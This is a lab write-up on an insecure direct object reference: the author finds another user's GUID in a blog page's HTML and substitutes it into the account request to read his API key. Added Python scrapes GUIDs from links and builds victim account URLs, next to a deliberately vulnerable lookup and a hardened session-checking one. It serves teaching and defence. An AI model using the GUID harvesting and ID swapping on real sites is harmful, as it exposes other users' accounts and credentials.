# User ID controlled by request parameter, with unpredictable user IDs

This lab has a horizontal privilege escalation vulnerability on the user account page, but identifies users with GUIDs. To solve the lab, find the GUID for carlos, then submit his API key as the solution. You can log in to your own account using the following credentials: `wiener:peter`

After logging in with my credentials and observing that the ID for my account is a GUID rather than a simple number, I navigated the site looking for somewhere carlos is referenced.

<figure><img src="/files/ty7TyMBIkERYGsVL5ZqE" alt=""><figcaption></figcaption></figure>

I came across one of carlos's blog posts on the site and inspected the HTML of the page. I noticed his account ID was in the HTML of the page.

<figure><img src="/files/EU8UALsQsW7o7qRpUgfZ" alt=""><figcaption></figcaption></figure>

I copied the element containing his ID and pasted it into Notepad.

<figure><img src="/files/QTZL2dCxTfSB698GsBEo" alt=""><figcaption></figcaption></figure>

I logged back into my account and swapped the ID in the request parameter for carlos's GUID, which returned his API key.

<figure><img src="/files/lLNaX7aoo6WMtmTcsYTW" alt=""><figcaption></figcaption></figure>
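The two steps above (harvest a GUID that the application leaks in another page, then substitute it into the account request) are mechanical enough to script. The following is an added example, not code from the lab or from the original post. It assumes the GUID appears as the value of a `userId` or `id` query parameter in a link (the parameter names and the sample HTML below are constructed assumptions), builds the account URL for the harvested GUID, and finishes with a minimal server-side lookup shown in its vulnerable form beside a hardened one, to make the security-relevant point explicit: an unpredictable ID is not an access control, the server still has to compare the requested ID against the session's own.

```python
import re
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlparse

# RFC 4122-style textual GUID: 8-4-4-4-12 hex digits.
GUID_RE = re.compile(r"^[0-9a-fA-F]{8}-(?:[0-9a-fA-F]{4}-){3}[0-9a-fA-F]{12}$")


class _LinkCollector(HTMLParser):
    """Collects (href, visible text) for every <a> element on a page."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._current = None  # [href, accumulated text] while inside an <a>

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._current = [dict(attrs).get("href"), ""]

    def handle_data(self, data):
        if self._current is not None:
            self._current[1] += data

    def handle_endtag(self, tag):
        if tag == "a" and self._current is not None:
            self.links.append((self._current[0], self._current[1].strip()))
            self._current = None


def find_user_guids(html, param_names=("userId", "id")):
    """Map link text (e.g. an author name) -> GUID found in that link's query string.

    Only parameter values that look like GUIDs are kept, so ordinary links such
    as /post?postId=3 are ignored. The parameter names are an assumption.
    """
    collector = _LinkCollector()
    collector.feed(html)
    found = {}
    for href, text in collector.links:
        if not href:
            continue
        query = parse_qs(urlparse(href).query)
        for name in param_names:
            for value in query.get(name, []):
                if GUID_RE.match(value):
                    found[text] = value
    return found


def account_url(base, guid, param="id"):
    """Build the account page URL with the victim's GUID in the request parameter."""
    return f"{base}/my-account?{param}={guid}"


# Constructed sample page: a blog post whose author link leaks the author's GUID,
# plus the logged-in user's own "My account" link. Not taken from the lab.
SAMPLE_HTML = """
<html><body>
<nav><a href="/">Home</a>
     <a href="/my-account?id=11111111-2222-4333-8444-555555555555">My account</a></nav>
<article>
  <h1>Constructed post title</h1>
  <p><span id="blog-author">
    <a href="/blogs?userId=c0ffee00-1234-4abc-8def-0123456789ab">carlos</a>
  </span></p>
  <a href="/post?postId=3">Read more</a>
</article>
</body></html>
"""


def vulnerable_lookup(session_user_id, requested_id, accounts):
    """Vulnerable: trusts the request parameter; any known GUID returns that account."""
    return accounts.get(requested_id)


def hardened_lookup(session_user_id, requested_id, accounts):
    """Hardened: the requested ID must equal the ID bound to the session.

    Returns None (deny) on mismatch; a real handler would respond 403/404.
    Unpredictable IDs do not replace this check, they only delay the attacker.
    """
    if requested_id != session_user_id:
        return None
    return accounts.get(requested_id)


if __name__ == "__main__":
    leaked = find_user_guids(SAMPLE_HTML)
    print(leaked)
    print(account_url("https://example.invalid", leaked["carlos"]))
```

In practice the first function is run over every page you can reach as `wiener` (blog index, individual posts, profile pages); any GUID that is not your own is a candidate for the `id` parameter on `/my-account`. The comparison in `hardened_lookup` is the entire fix: the server derives the account from the session and ignores, or strictly validates, the ID supplied by the client.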
